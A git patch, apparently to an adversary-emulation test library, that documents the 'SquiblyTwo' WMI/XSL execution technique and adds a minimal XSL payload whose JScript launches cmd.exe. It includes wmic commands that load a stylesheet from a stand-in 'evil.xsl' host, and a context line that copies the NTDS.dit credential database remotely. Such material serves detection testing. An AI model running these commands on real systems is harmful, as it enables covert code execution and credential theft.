From d508c3a71a48628e7f2a2a9938fc75e7feb38d64 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Tue, 1 May 2018 15:29:42 -0400
Subject: [PATCH] SquiblyTwo

Adding SquiblyTwo
---
 .../Execution/Windows_Management_Instrumentation.md   | 10 ++++++++++
 Windows/Payloads/squiblytwo/minimalist.xsl            | 11 +++++++++++
 2 files changed, 21 insertions(+)
 create mode 100644 Windows/Payloads/squiblytwo/minimalist.xsl

diff --git a/Windows/Execution/Windows_Management_Instrumentation.md b/Windows/Execution/Windows_Management_Instrumentation.md
index 31eaae36..1ea51ba0 100644
--- a/Windows/Execution/Windows_Management_Instrumentation.md
+++ b/Windows/Execution/Windows_Management_Instrumentation.md
@@ -43,3 +43,13 @@ Input:
 Input:
 
     wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
+
+### SquiblyTwo
+
+Input:
+
+    wmic process list /FORMAT:evil.xsl
+
+Input:
+
+    wmic os get /FORMAT:”https:///evil.xsl”
diff --git a/Windows/Payloads/squiblytwo/minimalist.xsl b/Windows/Payloads/squiblytwo/minimalist.xsl
new file mode 100644
index 00000000..404dc555
--- /dev/null
+++ b/Windows/Payloads/squiblytwo/minimalist.xsl
@@ -0,0 +1,11 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
+	]]> </ms:script>
+</stylesheet>